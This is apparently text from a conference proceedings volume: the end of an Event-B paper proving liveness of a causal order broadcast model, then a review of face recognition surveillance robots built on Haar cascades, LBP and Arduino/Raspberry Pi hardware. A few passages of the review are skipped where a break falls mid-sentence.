tively, and PROC is a finite set. Variables assumed are sender and causaldeliver.
Invariants 1 and 2 give sender and causaldeliver definition as mapping from MSG to
PROC and a relation between PROC and MSG, respectively. Invariant 3 states that any
message delivered by a process belongs to the set of messages that have been sent. In the
Event Broadcast, for any PROC p and MSG m, if m is not previously sent by the
sender process then it is broadcast to all processes, and the variable sender is updated.
In the event Deliver, for any PROC p and MSG m, if message m is sent by sender and
is not delivered by the process then m is delivered by p, and the variable causaldeliver
is updated.
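The abstract machine's two events can be sketched in Python using sets, which is our own illustrative rendering of the guards and actions just described, not Event-B syntax:

```python
# Sketch of the abstract machine: sender is a partial function MSG -> PROC
# (invariant 1) and causaldeliver is a relation between PROC and MSG
# (invariant 2). Process/message names are illustrative.
sender = {}
causaldeliver = set()

def broadcast(p, m):
    if m not in sender:          # guard: m not previously sent
        sender[m] = p            # action: record the sender of m

def deliver(p, m):
    if m in sender and (p, m) not in causaldeliver:  # guards
        causaldeliver.add((p, m))                    # action: m delivered at p

broadcast("p1", "m1")
broadcast("p2", "m1")    # guard fails: m1 already has a sender
deliver("p2", "m1")
deliver("p2", "m1")      # guard fails: no duplicate delivery
# Invariant 3: every delivered message has been sent.
assert all(m in sender for (_, m) in causaldeliver)
print(sender, causaldeliver)
```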
First Refinement: Figure 2 shows the first refinement of the causal order broadcast
machine. Typing invariant 4 defines causalorder as relation of MSG to MSG. Here,
ordering is done at the time of sending, so messages ordered will be in the set of
messages sent by the process as shown in invariant 5. Invariants 6 and 7 show that
causal ordering can be imposed only on those messages that have already been sent.
In the broadcast event, when a process p broadcasts a message m, then the updating of
the variable causalorder takes place as per the mappings specified by sender⁻¹[{p}]
× {m}. It shows that, as per the FIFO order, all messages broadcast by the process p
before broadcasting the message m causally precede message m. Similarly, local order
is confirmed by showing the mappings in causaldeliver[{p}] × {m} which signify
that the messages causally delivered to the process p before process p broadcasts
message m also causally precede message m. In the deliver event, guard 3 ensures that
message m has not yet been delivered at process p.
Second Refinement: In the second refinement, the vector clock value for each message
and process is initialized as zero. In the broadcast event of refinement-2, the causal
order of refinement-1 is replaced by vector clock rules. When
a message is broadcast by a process pp, the vector clock value of process pp,
VTP(pp)(pp), is incremented by 1, and the updated clock becomes the vector timestamp
of message m. The total number of messages sent by process pp is denoted by
VTP(pp)(pp). In the event
Deliver, a message is delivered to a process only if the receiving process has delivered
all the previous messages from the sender of that message. The vector timestamp of
the receiver process is compared to the vector timestamp of the incoming message to
ensure that all the messages delivered by the sender of that message before sending
it are also delivered at the receiver process.
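The delivery condition of the vector clock refinement can be sketched as follows. This is a simplified Python rendering of the comparison described above; the dictionary-based clocks and the function name are our assumptions, not the model's notation.

```python
# Delivery condition (sketch): message m from sender q with timestamp VTM_m
# may be delivered at process p with clock VTP_p only if
#   VTP_p[q] == VTM_m[q] - 1   (m is the next message in sequence from q), and
#   VTP_p[r] >= VTM_m[r]       for every other process r (all causally
#                               preceding messages were already delivered).
def can_deliver(VTP_p, VTM_m, q):
    if VTP_p[q] != VTM_m[q] - 1:
        return False
    return all(VTP_p[r] >= VTM_m[r] for r in VTM_m if r != q)

VTP_p = {"p": 0, "q": 1, "r": 0}
print(can_deliver(VTP_p, {"p": 0, "q": 2, "r": 0}, "q"))  # True: next from q
print(can_deliver(VTP_p, {"p": 0, "q": 3, "r": 0}, "q"))  # False: a message from q is missing
```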
4 Enabledness Preservation
The weaker notion of enabledness preservation as per Eq. (1) means that if the guards
of one of the events are triggered at the abstract level, then the guards of one or
more events will also be triggered at the refinement level. The stronger notion of
enabledness preservation as per [23] states that if the guards of an event a_i are
enabled in the abstraction, then either the guards of its refining event r_i or the guards
of one of the newly introduced events must also be enabled (Eq. (2)).
We prove both the weaker and the stronger notion of enabledness preservation by adding
the invariants 10, 11, and 12 to the first refinement machine Refinement 1.
For the weaker notion: Guard(Broadcast) ∨ Guard(Deliver) ⇒
Guard(Broadcast) ∨ Guard(Deliver).
Inv 10: ∀ m,p·((p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∉ dom(sender)) ∨ (m ∈
dom(sender) ∧ (p ↦ m) ∉ causaldeliver) ⇒
(p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∉ dom(sender)) ∨ (m ∈ dom(sender) ∧ (p ↦
m) ∉ causaldeliver) ∨ (p ∈ dom(deliveryorder))).
For the stronger notion: Guard(Broadcast) ⇒ Guard(Broadcast).
Inv 11: ∀ m,p·((p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∉ dom(sender)) ⇒
(p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∉ dom(sender))).
Guard(Deliver) ⇒ Guard(Deliver).
Inv 12: ∀ m,p·((p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∈ dom(sender) ∧ (p ↦ m) ∉
causaldeliver) ⇒
(p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∈ dom(sender) ∧ (p ↦ m) ∉ causaldeliver) ∨
(p ∈ dom(deliveryorder))).
The machine Refinement 2 also has two events Broadcast and Deliver which
refine the Broadcast and Deliver events, respectively, of the machine Refinement 1.
Similarly, we add the invariants 13, 14, and 15 to the machine Refinement 2 to prove
the weaker and stronger notion of enabledness preservation.
For the weaker notion: Guard(Broadcast) ∨ Guard(Deliver) ⇒
Guard(Broadcast) ∨ Guard(Deliver).
Inv 13: ∀ pp,m,p·((p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∉ dom(sender)) ∨ (m ∈
dom(sender) ∧ (p ↦ m) ∉ causaldeliver) ∨ (p ∈ dom(deliveryorder)) ⇒
(pp ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∉ dom(sender)) ∨ (nVTP = VTP(pp) <+ {pp ↦
VTP(pp)(pp) + 1}) ∨ (m ∈ dom(sender)) ∨ ((pp ↦ m) ∉ causaldeliver) ∨ (∀p·(p ∈
PROC ∧ p ≠ sender(m) ⇒ VTP(pp)(p) ≥ VTM(m)(p))) ∨ (VTP(pp)(sender(m))
= (VTM(m)(sender(m))) − 1)).
For the stronger notion: Guard(Broadcast) ⇒ Guard(Broadcast).
Inv 14: ∀ m,pp,p·((p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∉ dom(sender)) ⇒
(pp ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∉ dom(sender)) ∨ (nVTP = VTP(pp) <+ {pp
↦ VTP(pp)(pp) + 1})).
Guard(Deliver) ⇒ Guard(Deliver).
Inv 15: ∀ m,pp,p·((p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∈ dom(sender) ∧ (p ↦ m) ∉
causaldeliver) ∨ (p ∈ dom(deliveryorder)) ⇒
(pp ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∈ dom(sender)) ∨ ((pp ↦ m) ∉ causalde-
liver) ∨ (∀p·(p ∈ PROC ∧ p ≠ sender(m) ⇒ VTP(pp)(p) ≥ VTM(m)(p))) ∨
(VTP(pp)(sender(m)) = (VTM(m)(sender(m))) − 1)).
5 Non-divergence
Non-divergence is a liveness property which states that events which are newly
introduced in the refinement steps do not take control forever, i.e., the new events
should not diverge or run forever. A variant V, with V ∈ ℕ where ℕ is the set of
natural numbers, is used to prove that newly introduced events do not diverge.
The execution of a new event in the refinement decreases the value of the variant,
but the value of variant must never go below zero. In our model of causal order
broadcast, we would like to ensure that a message is never re-broadcast because of
repeated execution of broadcast event. It is also important to prove that each sent
message is delivered to each process only once. A new variable var is introduced in
the abstract model, and the value of var for each message is set to one. The variable
var is initialized as var := MSG × {1} in the initialization event. Each occurrence
of the broadcast event decreases the value of the variable var and sets it to zero.
Thereby once a message is broadcast, the value of the variable var becomes zero and
it cannot be decreased further. Therefore, if the invariants defined on the variable
var are satisfied, a message once broadcast cannot be broadcast again. Similarly, the
variable, delvar which is added to the abstract model ensures that a message once
delivered by a particular process successfully cannot be redelivered by it.
The invariants corresponding to the variables var and delvar are added to the
abstract model. Invariant 16 shows that variable var is assigned to each message and
is a natural number. Invariant 17 shows that the number of processes in the broadcast
system is finite. Invariant 18 shows that if the value of var for any message is zero
then that message has been broadcast. Invariant 19 states that for any message m,
the value of var is never negative; it cannot go below zero as var is a natural number.
Inv 16: var ∈ MSG → NATURAL.
Inv 17: card(PROC) ∈ NATURAL.
Inv 18: ∀(mm) · (mm ∈ MSG ∧ (var(mm) = 0) ⇒ mm ∈ dom(sender)).
Inv 19: ∀(m) · (m ∈ MSG ⇒ var(m) ≥ 0).
Inv 20: delvar ∈ MSG → NATURAL.
Inv 21: ∀(m) · (m ∈ MSG ∧ m ∈ dom(sender) ∧ causaldeliver⁻¹[{m}] = PROC
⇒ card(causaldeliver⁻¹[{m}]) = card(PROC)).
The initial value of delvar for each message is set to the total number of processes
in the system. On occurrence of each Deliver event, the value of delvar is decreased by
one. If a message is delivered to all the processes, the value of delvar for that message
becomes zero. Any re-delivery of the message at a process will set the value of delvar
to a negative value, thereby violating the invariants defined on delvar. Invariant 20
states that each message is assigned with a variable delvar which decreases as the
message is delivered by each process. Invariant 21 states that if a message is broadcast
by the sender and all processes have delivered the message then the number of
processes that delivered the message is equal to the number of processes in the system.
We further add invariants defined on the variables var and delvar to the model.
Invariant 22 states that if a message m is broadcast by any process and all the processes
have delivered m, then the value of delvar is zero.
Inv 22: ∀(m) · (m ∈ MSG ∧ m ∈ dom(sender) ∧ card(causaldeliver⁻¹[{m}]) =
card(PROC) ⇒ delvar(m) = 0).
Inv 23: ∀(m) · (m ∈ MSG ∧ m ∈ dom(sender) ∧ card(causaldeliver⁻¹[{m}]) <
card(PROC) ⇒ delvar(m) > 0).
Inv 24: ∀(m) · (m ∈ MSG ∧ (causaldeliver⁻¹[{m}] = PROC) ⇒ (delvar(m) =
0)).
Inv 25: ∀(m) · (m ∈ MSG ∧ causaldeliver⁻¹[{m}] ⊂ PROC ⇒ delvar(m) > 0).
Inv 26: ∀(m) · (m ∈ MSG ∧ m ∈ dom(sender) ⇒ card(causaldeliver⁻¹[{m}])
≤ card(PROC)).
Invariant 23 states that if a message m has not been delivered to all the processes
then delvar > 0. This means that message m has not been delivered to some processes.
Invariants 24 and 25 state that if a message has been delivered to all the processes
then the value of delvar is zero else it is more than zero. Similarly, invariant 26 states
that the number of processes a message has been delivered to will always be less than
or equal to the total number of processes in the system. The model and the invariants
shown above were checked successfully using the Rodin platform with the ProB
animator and model checker, and no anomalies were found. This confirms that in
our model of causal order broadcast, each message is broadcast only once, and every
process delivers each message only once.
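The variant argument above can be simulated in a few lines of Python. This is an illustrative sketch only; in the actual development, the argument is discharged as invariants and proof obligations in Rodin.

```python
# Sketch of the variant argument: var starts at 1 per message and drops to 0
# on broadcast; delvar starts at card(PROC) and drops by 1 per delivery.
# Neither may go below zero, so no message is re-broadcast or re-delivered.
PROC = {"p1", "p2", "p3"}
MSG = {"m1"}
var = {m: 1 for m in MSG}              # var := MSG x {1}
delvar = {m: len(PROC) for m in MSG}   # delvar starts at card(PROC)
delivered = set()

def broadcast(m):
    assert var[m] > 0, "re-broadcast would drive the variant below zero"
    var[m] -= 1

def deliver(p, m):
    assert (p, m) not in delivered and delvar[m] > 0, "re-delivery forbidden"
    delvar[m] -= 1
    delivered.add((p, m))

broadcast("m1")
for p in PROC:
    deliver(p, "m1")
print(var["m1"], delvar["m1"])  # both reach 0 once every process has delivered
```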
6 Conclusions
The liveness property in the Event-B model of causal order broadcast system has
been discussed in this paper. Liveness property expresses that the Event-B model
makes progress. To ensure the property of liveness in the proposed model, we had to
ensure that our model of causal order broadcast is enabledness preserving and non-
divergent. Proving non-divergence in the model of causal order broadcast system
requires us to prove that no message is re-broadcast in our system, and each message
is delivered to each process only once. We have outlined how we can introduce a
variant and how the invariant properties can be constructed on variants. Enabledness
preservation can be proved by proving that when the refined model makes progress,
the abstract model also makes progress. We have outlined the process of construction
of invariant properties to ensure enabledness preservation. This work was carried out
using the Rodin platform and the ProB model checker. Both enabledness preservation
and non-divergence properties are preserved in this model of causal order broadcast
system, thus ensuring the liveness property in the model. The proof statistics of the
Event-B model of causal order broadcast system with liveness property are given
below in Table 1:
The model was checked successfully using Rodin platform with ProB animator
model checker, and no anomalies were found. A total of 74 proof obligations were
generated and discharged either automatically or interactively.
References
1. Kindler, E. (1994). Safety and liveness properties: A survey. Bulletin of the European
Association for Theoretical Computer Science, 53, 268–272.
2. Lamport, L. (1977). Proving the correctness of multiprocess programs. IEEE Transactions on
Software Engineering, 3(2), 125–143.
3. Abrial, J. R. (1996). The B-Book: Assigning Programs to Meanings. Cambridge University
Press, Cambridge.
4. Butler, M., & Yadav, D. (2008). An incremental development of mondex system in Event-B.
Formal Aspects of Computing, 20(1), 61–77.
5. Bodeveix, J. P., Dieumegard, A., & Filali, M. (2020). Event-B formalization of a variability-
aware component model patterns framework. Science of Computer Programming, 199, 102511.
6. Lahbib, A., et al. (2020). An event-B based approach for formal modelling and verification
of smart contracts. In International Conference on Advanced Information Networking and
Applications. Springer.
7. Metayer, C., Abrial, J. R., & Voisin, L. (2005). Event-B language. RODIN deliverables 3.2,
http://rodin.cs.ncl.ac.uk/deliverables/D7.pdf.
8. Suryavanshi, R., & Yadav, D. (2012). Rigorous design of lazy replication system using Event-B.
In International Conference on Contemporary Computing. Springer.
9. Girish C., & Yadav, D. (2010). Analyzing data flow in trustworthy electronic payment systems
using event-B. In International Conference on Data Engineering and Management. Springer.
10. Yadav, D., & Butler, M. (2009). Formal development of a total order broadcast for distributed
transactions using Event-B. In Methods, Models and Tools for Fault Tolerance, Lecture Notes
in Computer Science (LNCS) (Vol. 5454, pp. 152–176). Springer.
11. Lahouij, A., et al. (2020). An Event-B based approach for cloud composite services verification.
Formal Aspects of Computing, 32(4), 361–393.
12. Yadav, D., & Butler, M. (2006). Rigorous design of fault-tolerant transactions for replicated
database systems using Event-B. In M. Butler, C. B. Jones, A. Romanovsky, & E.
Troubitsyna (Eds.), Fault-Tolerant Systems, LNCS (Vol. 4157, pp. 343–363). Springer.
13. B Core UK Ltd. (1999). B-Toolkit Manuals.
14. Steria (1997). Atelier-B User and Reference Manuals.
15. Abrial, J. R., & Cansell, D. (2003). Click'n'Prove: Interactive proofs within set theory.
16. Abrial, J.-R., Butler, M., Hallerstede, S., Hoang, T. S., Mehta, F., & Voisin, L. (2010). Rodin:
An open toolset for modelling and reasoning in Event-B. International Journal on Software
Tools for Technology Transfer (STTT), 12(6), 447–466.
17. Lamport, L. (1978). Time, clocks, and the ordering of events in a distributed system.
Communications of the ACM, 21(7), 558–565.
18. Yadav, D., & Butler, M. (2007). Formal specifications and verification of message ordering
properties in a broadcast system using Event-B. In Technical Report. School of Electronics and
Computer Science, University of Southampton.
19. Birman, K., Schiper, A., & Stephenson, P. (1991). Lightweight causal and atomic group
multicast. ACM Transactions on Computer Systems, 9(3), 272–314.
20. Pooja, Y., Suryavanshi, R., Singh, A. K., & Yadav, D. (2019). Formal verification of causal
order-based load distribution mechanism using Event-B. In Data Engineering and Applications
(pp. 229–241). Springer.
21. Abrial, J.-R. (1996). Extending B without changing it (for developing distributed systems). In
H. Habrias (Ed.), First B Conference.
22. Yadav, D., & Butler, M. Formal development of broadcast systems and verification of ordering
properties using Event-B.
23. Yadav, D., & Butler, M. (2009). Verification of liveness properties in distributed systems.
In International Conference on Contemporary Computing (pp. 625–636). Springer.
A Comparative Study on Face
Recognition AI Robot
Abstract Face recognition, an application of image processing, has gained a lot of
attention. People have started researching and working on it to enhance the field of
automation, security, and surveillance. The main reason behind this hype is the vast
availability of commercial applications and accessibility to the latest technologies.
Though machine-level recognition systems have gained a certain level of perfection,
their success rate can be limited depending on the application. This is because the
image captured by an outdoor system is hard to detect and recognize due to changes
in light, different background conditions, and variations in the position of the person
or object. So, we can say that the present system is far behind the perfection that
a human possesses. This paper provides information on both still and moving, i.e.,
video-based face recognition. The main reason behind writing this review paper is to
shed light on the existing literature on this topic and add some more value to knowl-
edge gained concerning machine-based face recognition. Most of the systems use
the local binary pattern (LBP) approach to perform face recognition. For detecting
the face in the captured image, the Haar cascade algorithm is used where the person’s
facial feature is extracted and saved in a database for future reference. So, to provide
an effective survey, we have classified the existing method for face recognition and
explored the latest emerging technologies in this field.
1 Introduction
A face recognition robot utilizes a method of image processing for detecting a face
using a camera. The robot [1–5] identifies various essential features of the face
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_17
212 S. Sunar et al.
from the captured image and then compares it with the stored data. Various algo-
rithms/methods/techniques are used for recognizing a human face, such as local
binary pattern (LBP), support vector machine (SVM), etc.
Most face recognition systems use the PiCamera module to capture the image, while
a Raspberry Pi 3 is used to implement face detection and recognition [1–8].
AdaBoost, which Paul Viola and Michael Jones applied to face detection in 2001, is
used for face detection.
This algorithm majorly uses a cascade classifier that comes under a Haar-like feature.
This feature gives them a unique ability to detect a human face, regardless of the
background conditions, the color of the image captured, size, and shape. For
recognizing a face quickly, on the other hand, the local binary pattern algorithm is
used [6–8, 10].
The face’s digital image is immediately divided into pixels, which are later used for
further processing. The identified feature compares pixels to pixels with that of the
features stored in the dataset [11–13]. The robot performs various activities that are
controlled using an Arduino Uno. It detects the motion of any object using a PIR
sensor that initiates the recognition process. It is also responsible for controlling the
robot’s motion using a phone [13–16]. When the human’s face is recognized, an SOS
message (alert message) is sent to the organization’s owner.
The whole process performed by the robot is divided into three stages:
• In the first stage [1–11], a face is detected using the Viola–Jones detection
algorithm.
• Further [5–10], in the second stage, the detected face is tracked using the
Kanade–Lucas–Tomasi (KLT) algorithm.
• Additionally, in the third stage, the vital features are identified, which completes
the tracking process. Broadly, the whole procedure of tracking a face is an
amalgamation of detection followed by identifying unique points in the detected
face using any of the known algorithms.
2 Literature Review
In [1], the face recognition is performed with the cascade classification and LBPH
face recognizer method using Python 2.7 with OpenCV library. It offers excellent
accuracy of 92.73%. The paper [2] performs real-time human–robot interaction
indoors, where it processes 11 frames per second and provides a 94% recognition rate
using a visual tracking architecture and an RBF neural network. It performs rapid face
recognition of family members, as each member has a distinct RBF neural network.
Paper [3] presents a comparison between Adaboost and Imaboost. Adaboost, using a
combination of a simple classifier, generates a comparatively strong classifier where
the clonal selection algorithm replaces the best classifier. A combination of AdaBoost
and artificial immune system is proposed as Imaboost, which has enhanced system
processing by improving the classification performance.
In [4], face detection is performed on a live video stream for security in commercial
places. It is designed to perform the detection using the web camera and to track the
detected face using Arduino and OpenCV, where the primary algorithm used is
3 Implementation
A robot has a specific surveillance cycle, which is divided into two states: an
active state and an idle state [1–5]. During the idle state, the robot remains
stationary inside the organization, whether it is a home or an office, during the daytime,
and moves around the same compound at night. This is because, at that time
[7–15], the PIR sensor is active and searches for any movement around it. As we
know, the sun radiates infrared radiation continuously; so, if the sun's rays fall on the
PIR sensor, it generates an alarm signal even if no movement is detected. During
the daytime, the robot is placed indoors so that the PIR sensor is not directly exposed to
the sunlight. During the active state, I2C communication is established between
Raspberry Pi and Arduino Uno using a camera module. In the structure made for
the robot, the camera is inclined at an angle of 45° with reference to the ground.
At this angle, the camera detects a human face, captures it, and moves to the face
recognition process. When the face gets matched to the face saved in the dataset, it
sends a message to the owner with the name of that person recognized by the robot.
On the other hand, if the face is not matched with that in the dataset, an alert message
is sent through a GSM module.
Various methods are used for detecting the face, such as the Viola–Jones method [6–
13]. It relies on a few crucial concepts to detect a human
face.
1 Haar feature: This is a feature [14–19], which analyzes the captured image to
find out whether there is a human face or not. It divides the captured image into
two parts: the dark side and the bright side. It creates the average of all the dark
pixels and the average of light pixels, and both the averages are subtracted to
obtain the required pixels.
2 Adaboost algorithm: It is considered to be the easiest and fast process. Viola and
Jones used this algorithm because it increases the performance using elementary
learning. During the Adaboost learning, the output of this is various data that can
be grouped to form a classifier, which can be further used. The classifier contains
a very small feature of the detected face, which is why they are commonly used
to detect the pattern in the whole process.
3 Integral image: The integral image is a vital concept that accelerates the feature
detection process. The value at each location of the integral image is the sum of
the pixels above and to the left of that location in the original image. This
summation proceeds from the top left to the bottom right of the image (Fig. 1).
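The integral image idea can be sketched in pure Python. This is an illustrative sketch; the actual system would rely on OpenCV's built-in routines, and the function names here are our own.

```python
# Pure-Python integral image: ii[y][x] holds the sum of all pixels above
# and to the left of (x, y) in the original image. Any rectangle sum then
# needs only four lookups instead of scanning every pixel.
def integral_image(img):
    h, w = len(img), len(img[0])
    ii = [[0] * (w + 1) for _ in range(h + 1)]  # padded with a zero border
    for y in range(h):
        for x in range(w):
            ii[y + 1][x + 1] = (img[y][x] + ii[y][x + 1]
                                + ii[y + 1][x] - ii[y][x])
    return ii

def rect_sum(ii, x0, y0, x1, y1):
    """Sum of pixels in the rectangle [x0, x1) x [y0, y1)."""
    return ii[y1][x1] - ii[y0][x1] - ii[y1][x0] + ii[y0][x0]

img = [[1, 2],
       [3, 4]]
ii = integral_image(img)
print(rect_sum(ii, 0, 0, 2, 2))  # 10, the sum of all pixels
```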
One of the many face recognition approaches is the local binary pattern (LBP) [3–15].
The pixel value at the center is compared with the 8 surrounding pixels around
it. To match the similarities between the captured image and the image in the dataset,
the LBP method can be used. In this approach, the value of the center pixel is
subtracted from each surrounding pixel value. It works on a 3 × 3 pixel matrix. The
result is 1 if the difference is greater than or equal to 0, and 0 if the difference is
less than 0. The binary values obtained for the 8 surrounding pixels of the 3 × 3
matrix are then read either clockwise or anti-clockwise and converted into
decimal form to replace the pixel value of the center (Figs. 2 and 3).
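The 3 × 3 LBP computation described above can be sketched in Python. This is a minimal illustration; the neighbour ordering (clockwise from the top-left) and the function name are our assumptions.

```python
# LBP code of the centre pixel of a 3x3 neighbourhood: each neighbour is
# thresholded against the centre (1 if >= centre, else 0), the bits are
# read clockwise from the top-left, and the binary string is converted
# to a decimal value that replaces the centre pixel.
def lbp_3x3(block):
    c = block[1][1]
    # clockwise order starting at the top-left neighbour
    neighbours = [block[0][0], block[0][1], block[0][2], block[1][2],
                  block[2][2], block[2][1], block[2][0], block[1][0]]
    bits = ["1" if n >= c else "0" for n in neighbours]
    return int("".join(bits), 2)

block = [[6, 5, 2],
         [7, 6, 1],
         [9, 8, 7]]
print(lbp_3x3(block))  # binary 10001111 -> 143
```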
• Detection:
Due to technological advancement, there are various devices such as webcam
and many others that can be used to obtain input video. The video
obtained is broken down into multiple frames, and each frame is examined
closely to detect any face in it. The detection is carried out on all the frames, and once
the face is detected in any of the frames, a box is drawn around the face detected
[17, 18]. Now, the coordinates of the boxes drawn are saved for future reference.
This is performed using MATLAB software. Now the coordinates obtained are
fed into the microcontroller.
• Tracking:
Once the coordinates are fed to the Arduino, the microcontroller tracks the detected
human's face. Arduino is one of the most popular open-source platforms, with both
software and hardware components. For controlling the motion of the robot, servo
motors are used, and two such servo motors are interfaced with the microcontroller
for this purpose [19]. Before performing any task, the servo motors are calibrated to
the center. The coordinates fed to the microcontroller are used to track the face in the
specified frame. With the person's movement, the position of the webcam also changes,
but there is a constraint that the servo motors rotate only within a limited angular
range [20]. Viola–Jones operates only on front-facing faces, so instead of Viola–Jones,
the KLT algorithm can be considered to track the face even in a live video (Fig. 4).
4 Hardware Specification
Its small size, like that of a credit card, along with the Wi-Fi and Bluetooth modules
already present on the board, makes the Raspberry Pi more profitable to use than
a plain microcontroller [1–12]. So, the Arduino Uno and Raspberry Pi are considered the
most crucial components used in most of the robots. Apart from the Raspberry Pi [1–5],
there are also a few other important components such as the chassis (body of the robot),
motors, and battery; the robot also contains a motor driver (L293D) for
controlling its movement [6–11].
One of the most critical applications of the robot is sending an SMS to the
owner's number; for this, a GSM module (SIM900A) has been installed.
In order to monitor everything that the robot is recording, processing, and displaying,
a remote display is also used, and it is connected to the robot using a Wi-Fi module.
PIR sensor is considered one of the few important components because it initiates
the detection whenever it identifies some movement nearby. After the PIR sensor
detects any motion, it sends a signal to the Arduino board. A signal is then sent to the
Raspberry Pi, which captures the moving object's image and initiates the face
detection and recognition process.
For tracking [1–13], an Arduino and servo motors were used to employ the
Viola–Jones technique, though it has a few restrictions, one being that
it operates only on front-facing faces. So, it was later improved and modified by
using the KLT technique to track faces even in live videos. In the modified technique,
the ATmega328P microcontroller was used along with the Arduino and a webcam.
5 Software Specification
We can say that software forms the backbone of this robot. Without the software, it cannot perform any task. As we have already discussed, the robot's task is divided into three parts: face detection, face recognition, and generating an alert signal. For face detection and face recognition, programming is done in Python, whereas programming on the Arduino is done for generating the alert signal.
In [1–4], the Haar cascade is used to perform face detection, which is carried out using the OpenCV tool. In this technique, a dataset contains images with the feature (positive images) and images without the feature (negative images), which are used to train the classifier to operate accurately. It gives the most efficient result because the more we train the robot, the better its result. In this process, the robot tries to detect a human face in a frame of the video; once a face is detected, it draws a box around the face, and the coordinates of the box are saved in the microcontroller for further processing.
For AI-based robots, a dataset needs to be created for training, since the more the robot is trained, the more precise its output will be. For creating the dataset [1–7], hundreds of images of humans are taken and face detection is performed; each detected face is saved in the dataset folder. For the robot's training [8–17], the local binary pattern (LBP) approach is primarily used.
Equation (1) is used for calculating the LBP code of a pixel:

$$\mathrm{LBP}_{P,R}(x_c, y_c) = \sum_{p=0}^{P-1} s(g_p - g_c)\, 2^p \qquad (1)$$

where $g_c$ is the gray value of the center pixel $(x_c, y_c)$, $g_p$ ($p = 0, \dots, P-1$) are the gray values of its $P$ neighbors on a circle of radius $R$, and $s(x) = 1$ if $x \ge 0$ and $0$ otherwise.
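Written out, the LBP operator thresholds each of the P neighbors against the center pixel and packs the results into a binary code. A minimal pure-Python sketch (the neighbor ordering is assumed fixed but arbitrary):

```python
def lbp_code(center, neighbors):
    """LBP_{P,R} code of a pixel: sum over p of s(g_p - g_c) * 2^p,
    where s(x) = 1 if x >= 0 and 0 otherwise."""
    return sum((1 if g_p >= center else 0) << p
               for p, g_p in enumerate(neighbors))

# 8 neighbors (P = 8) of a center pixel with gray value 5:
print(lbp_code(5, [6, 4, 7, 5, 3, 9, 2, 8]))  # → 173
```

A full LBP descriptor for recognition is then built by histogramming these per-pixel codes over regions of the face image.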
So, it is observed that face detection and face recognition use the cascade algorithm, which is performed using the OpenCV tool, and the alert signal is generated using the Arduino IDE. The final training of the robot on the dataset is done using the LBP technique to increase its efficiency.
After creating the database of captured images, a face can be detected at any of the available pixel positions of an image in the database, and there is a coordinate corresponding to every detected face. Every captured image has a particular resolution; e.g., live video captured by a webcam has a resolution such as 1280×720 (or 640×360 or 640×480). Now, we need to find the coordinates of the detected face, which can be done by using the following formulas:
$$X_c = X + \frac{w}{2}, \qquad Y_c = Y + \frac{h}{2}$$

where

X = initial horizontal coordinate of the face
w = width of the face
X_c = horizontal center coordinate of the face
Y = initial vertical coordinate of the face
h = height of the face
Y_c = vertical center coordinate of the face.
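In code, the center of a detected face's bounding box, and its offset from the frame center that a tracking servo would drive toward zero, can be computed as follows (a minimal sketch; the 1280-pixel frame width is taken from the example resolution above):

```python
def face_center(x, y, w, h):
    """Center of a face bounding box: (X + w/2, Y + h/2)."""
    return (x + w / 2, y + h / 2)

def pan_error(center_x, frame_width=1280):
    """Signed horizontal offset of the face from the frame center;
    a tracking servo would turn to drive this toward zero."""
    return center_x - frame_width / 2

cx, cy = face_center(100, 50, 60, 80)
print(cx, cy)         # → 130.0 90.0
print(pan_error(cx))  # → -510.0 (face is left of center)
```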
The face recognition robots developed so far, though considered a great advancement of technology, have saturated in their application: despite using various high-end technologies, they do nothing other than capture an image, recognize a face, and store the image in the database. They should have some real-time application that is adaptive to the surroundings and the conditions around them. The existing face recognition robots are lacking in this respect.
In this work, apart from face recognition, which is the heart of the project, an attempt is made to make the robot more beneficial for day-to-day safety. In the present scenario, the whole world is fighting against Corona, and wherever a person goes, whether office, college, school, or mall, a person with an infrared thermometer is initially seen measuring body temperature. The further scope of this work is to make an AI-based robot that recognizes any person and at the same time measures their body temperature.
8 Conclusion
This paper is presented with the aim of reviewing the papers written and the technologies developed in the field of face recognition. The present study concludes that using hybrid methods of computing such as ANN, SVM, and SOM results in an enhanced face recognition algorithm. We have also described the various problems faced during face recognition in an unconstrained environment, along with the reasons why they need further study and research. Several techniques used in various papers on these topics have also been presented, as have the various methods required to develop the most effective and efficient face recognition system. This review has also tried to present various vital areas where research can be done, and it should help researchers in this field who are trying to come up with new and efficient technology.
References
1. Mittal, S., Rai, J. K. (2016). Wadorp: An autonomous mobile robot for surveillance. In
IEEE International Conference on Power Electronics. Intelligent Control and energy systems
(ICPEICES).
2. Maneesha, K., Shree, N., Pranav, D. R., Sindhu, S. K., & Gururaj, C. (2017). Real time face
detection robot. In 2017 2nd IEEE International Conference on Recent Trends in Electronics,
Information & Communication Technology (RTEICT). https://doi.org/10.1109/rteict.2017.8256558.
3. Viola, P., & Jones, M. (2001). Rapid object detection using boosted cascade of simple features.
IEEE Computer Society Conference on Computer Vision and Pattern Recognition, I, 511–518.
4. Viraktamath, S. V., Katti, M., Khatawkar, A., & Kulkarni, P. (2013). Face detection and tracking
using OpenCV. The SIJ Transactions on Computer Networks & Communication Engineering (CNCE),
1(3), 45–50.
5. Alweshah, O. A., Alzubi, J. A., & Alzubi, S. A. M. (2016). Solving attribute reduction problem
using wrapper genetic programming. International Journal of Computer Science and Network
security, 16(5), 77.
6. Sanjaya, W. S. M., Anggraeni, D., Zakaria, K., Juwardi, A., Munawwaroh, M. (2017). The
design of face recognition and tracking for human-robot interaction. In 2017 2nd Inter-
national conferences on Information Technology, Information Systems and Electrical Engi-
neering (ICITISEE), Yogyakarta, 2017 (pp. 315–320). https://doi.org/10.1109/ICITISEE.2017.8285519.
7. Stekas, N., & Heuvel, D. V. (2016). Face recognition using Local Binary Patterns Histograms (LBPH) on an FPGA-based System on Chip (SoC). In IEEE International Parallel and Distributed Processing Symposium Workshops, November 2016.
